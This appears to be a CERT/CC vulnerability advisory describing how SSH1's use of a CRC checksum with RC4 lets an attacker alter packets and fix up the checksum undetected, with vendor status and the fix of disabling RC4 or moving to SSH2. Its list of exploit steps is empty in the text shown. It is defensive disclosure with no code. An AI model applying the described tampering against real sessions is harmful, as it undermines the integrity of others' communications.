There is an information integrity vulnerability in the SSH1 protocol that allows RC4 encrypted packets to be modified without notice.
Client has requested RC4 and server supports it.
Compression is disabled.
When using the RC4 stream cipher, SSH1 uses a cyclic redundancy check (CRC) algorithm to perform an integrity check on incoming packets. Because the CRC checksum can be modified, an attacker can intercept an SSH packet, modify its contents, then modify the CRC to match. When the packet is then retransmitted from the attacker to the victim, the CRC integrity check will pass. This means that the attacker can make arbitrary modifications to the packet and the victim will be unable to detect them. This vulnerability results from the fact that CRC is not intended for cryptographic integrity checks. As a result, the CRC algorithm does not contain any security measures to prevent tampering with the checksum.
To exploit this vulnerability, an attacker must:
Because the CRC has been modified to account for the "addition" of M, the CRC integrity check on the victim's SSH client will pass.
Attackers can modify or logically delete arbitrary SSH packets.
SSH Secure Communications recommends disabling RC4 in SSH1 or upgrading to SSH2.
Vendor| Status| Date Notified| Date Updated
SSH Communications Security| | -| 06 Feb 2001
OpenSSH| | -| 29 Oct 2001
If you are a vendor and your product is affected, let us know.
Group | Score | Vector
Base | N/A | N/A
Temporal | N/A | N/A
Environmental | N/A | N/A
The CERT/CC thanks Antti Huima, Tuomas Aura, and Janne Salmi for their analysis and Tatu Ylonen for bringing this vulnerability to our attention.
This document was written by Jeffrey P. Lanza.